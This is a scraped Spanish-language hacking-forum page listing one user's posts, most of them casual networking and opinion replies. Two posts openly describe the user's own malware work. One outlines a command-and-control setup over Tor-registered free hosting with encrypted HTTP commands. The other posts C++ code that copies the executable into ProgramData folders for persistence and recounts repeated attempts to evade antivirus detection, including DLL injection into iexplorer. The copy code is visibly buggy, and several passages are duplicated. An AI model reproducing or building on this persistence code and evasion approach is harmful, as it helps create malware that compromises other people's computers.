Yo creo que no es algo nuevo, google o la nsa no han dejado de espiarnos. Seguramente sabrán en que hora voy al servicio 
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#211
Noticias / Re: Ahora Facebook rastrea las actividades del usuario en Internet y recopila sus...
5 Febrero 2015, 01:00 AM #212
Redes / Re: Mac identicas robo de sesion
4 Febrero 2015, 02:23 AMCita de: engel lex en 4 Febrero 2015, 01:35 AM
si es inalambrico, no necesitas la misma mac... ya que la conexión viaja en todas direcciones y con la tarjeta adecuada puedes leer los datos...
Es decir que se puede espiar toda la red wifi sin estar ni siquiera conectado? Creo que lo he entendido mal.
#213
Redes / Mac identicas robo de sesion
4 Febrero 2015, 01:29 AM
Hola viento un tema del foro se me ocurrió esto:
Una red con 1 pc que se ha logueado en una pagina. Se conecta un portátil con la misma MAC y los paquetes le empiezan a llegar a el ,a los dos o incompletos. El portátil sigue la sesión y entra en la pagina ya logueado.
Bueno creo que no se podrá por la llegada de paquetes incompletos pero no estoy seguro.
Saludos
Una red con 1 pc que se ha logueado en una pagina. Se conecta un portátil con la misma MAC y los paquetes le empiezan a llegar a el ,a los dos o incompletos. El portátil sigue la sesión y entra en la pagina ya logueado.
Bueno creo que no se podrá por la llegada de paquetes incompletos pero no estoy seguro.
Saludos
#214
Foro Libre / Re: ¿Te consideras un hacker?
1 Febrero 2015, 22:52 PM
Yo creo que te conviertes en "hacker" cuando demuestres tus conocimientos ante una comunidad de hackers verdaderos que han demostrado saber mucho mas que los demás.
#215
Hacking / Re: ocultar ip
1 Febrero 2015, 13:59 PMCita de: juansicaman en 31 Enero 2015, 13:00 PM
si quieres ocultar tu red
abre el cmd en modo ejecutar como administrador y poner
net config server /hidden:yes
si quieres desactivar la ocultacion lo mismo pero teminado en no
No oculta tu ip solo no te muestra ne la red local aunque creo que con solo esto no sirve.
Tor es la clave.
#216
Redes / Re: [Pregunta] Duda sobre recepción paquetes de red/ip
31 Enero 2015, 11:27 AM
Lo que yo se es que la cabecera se puede modificar y la ip también aunque algunos routers no te lo permiten. El servidor enviara un paquete diciendo que ha recibido su petición pero la otra ip no le contestara y se acabo la conexión. Aunque empiece a mandar el archivo nadie lo va recibir porque no lo esperan y se descarta el paquete.
Si me confundo que alguien me corrija.
Saludos
Si me confundo que alguien me corrija.
Saludos
#217
Foro Libre / Re: Cual es tu lenguaje de programacion favorito?
30 Enero 2015, 15:55 PM
El mejor C++ y luego van javascript y php. Python también esta bien.
Java lo que he visto que es poco no me gusta nada.
Java lo que he visto que es poco no me gusta nada.
#218
Hacking / Re: Codigos fuentes de virus en c++
28 Enero 2015, 23:39 PMCita de: xDie en 28 Enero 2015, 15:27 PM
Porque no emprendes hacerlo!, de una vas a prendiendo, lo mas complejo es ser indetectado, asi que en visual podes meter instrucciones dentro de un timer, etc. hay mucha info. empeza con un simple troyano que se valla haciendo gusano, y se conecte a un canal IRC, luego vas a tener una troja de zombies para floodear como harto lammer.
Saludos
Hola pedí los códigos fuentes solo por ver como estaban hechos y por intereses y ya los encontré hace tiempo 60 gb
Lo de hacer troyanos ya he hecho algunos y la verdad es que me esperaba algo mas de los antivirus pero bueno. En uno me pillaron
Lo del IRC yo hago algo en plan, me registro en un hosting gratis usando tor para el registro y cada vez que entro. Me hago una base de datos con un control panel en php y luego con c++ me conecto con http al servidor para pasar los comandos criptados. Así no se me ocurre como te pueden pillar.
Saludos
#219
Desafíos - Wargames / Re: Vuelvo otra vez, con el juego mejorado
28 Enero 2015, 16:47 PM
Alguien nivel 7 
#220
Análisis y Diseño de Malware / Re: Los antivirus analizan los nombres de las funciones de tu programa ?
25 Enero 2015, 22:05 PM
Gracias por el link, lo vi pero voy a intentar lo en el siguiente malware, con este quiero algo mas simple.
Lo que hace que el antivirus salte es esta parte del código:
Buscar una carpeta en la appdata en la que no hay archivo con el mismo nombre y se copia ahí. La funcion copyFile la escribí después de que me lo detectase con CopyFile de la api de windows.
Seguí intentando y cambia la función copyFile de modo que abro el archivo en binario pero luego cojo todo carácter por carácter y lo guardo en un string para escribir lo en el nuevo archivo.
La copia es un poco rara pero me salta el antivirus justo en esta parte strBuffer += copyBuffer->sbumpc();
Es como si esta esperando que haga una acción de leer el ejecutable o algo así para detectar.
Seria una buena idea inyectar una dll por ejemplo a iexplorer que me copie el archivo ?
@Edit: Consegui hacer que no lo detecte y seguí con el programa pero en unos 3 o 4 "debuggings" al final volvió a detectarlo en casi el mismo sitio.
Mi conclusión: Creo que al auto copiarse muchas veces por las pruebas que hago con el antivirus activo al final lo detecta pero no la primera vez.
Que tal esta mi conclusión?
Lo que hace que el antivirus salte es esta parte del código:
Código (cpp) [Seleccionar]
WIN32_FIND_DATA findData;
HANDLE firstFile = FindFirstFile((string(getenv("programdata")) + "\\*").c_str(), &findData);
while (FindNextFile(firstFile, &findData) != 0){
c.setpPath("");
if (strcmp(findData.cFileName, ".") == 0 || strcmp(findData.cFileName, "..") == 0)
continue;
if (findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){
c.setpPath(string(getenv("programdata")) + "\\" + findData.cFileName);
string where = c.getpPath() + "\\" + findData.cFileName + ".exe";
if (copyFile(fileName, where)){
c.setpName(findData.cFileName);
log << "\nExe copied to " << c.getpPath() + "\\" + findData.cFileName + ".exe";
break;
}
else{
log << "\nExe failed copy to " << c.getpPath() + "\\" + findData.cFileName + ".exe" << ". ";
printError(log);
}
}
}Buscar una carpeta en la appdata en la que no hay archivo con el mismo nombre y se copia ahí. La funcion copyFile la escribí después de que me lo detectase con CopyFile de la api de windows.
Seguí intentando y cambia la función copyFile de modo que abro el archivo en binario pero luego cojo todo carácter por carácter y lo guardo en un string para escribir lo en el nuevo archivo.
Código (cpp) [Seleccionar]
if (ffile.good()){
ofstream tfile(to, ofstream::binary);
string strBuffer = "";
streambuf * copyBuffer = ffile.rdbuf();
while (copyBuffer->sgetc() != EOF){
strBuffer += copyBuffer->sbumpc();
}
for (int i = 0; i < strBuffer.size(); i++){
tfile.put(strBuffer[0]);
}
if (tfile.good())
return true;
return false;
}
else{
return false;
}La copia es un poco rara pero me salta el antivirus justo en esta parte strBuffer += copyBuffer->sbumpc();
Es como si esta esperando que haga una acción de leer el ejecutable o algo así para detectar.
Seria una buena idea inyectar una dll por ejemplo a iexplorer que me copie el archivo ?
@Edit: Consegui hacer que no lo detecte y seguí con el programa pero en unos 3 o 4 "debuggings" al final volvió a detectarlo en casi el mismo sitio.
Mi conclusión: Creo que al auto copiarse muchas veces por las pruebas que hago con el antivirus activo al final lo detecta pero no la primera vez.
Que tal esta mi conclusión
?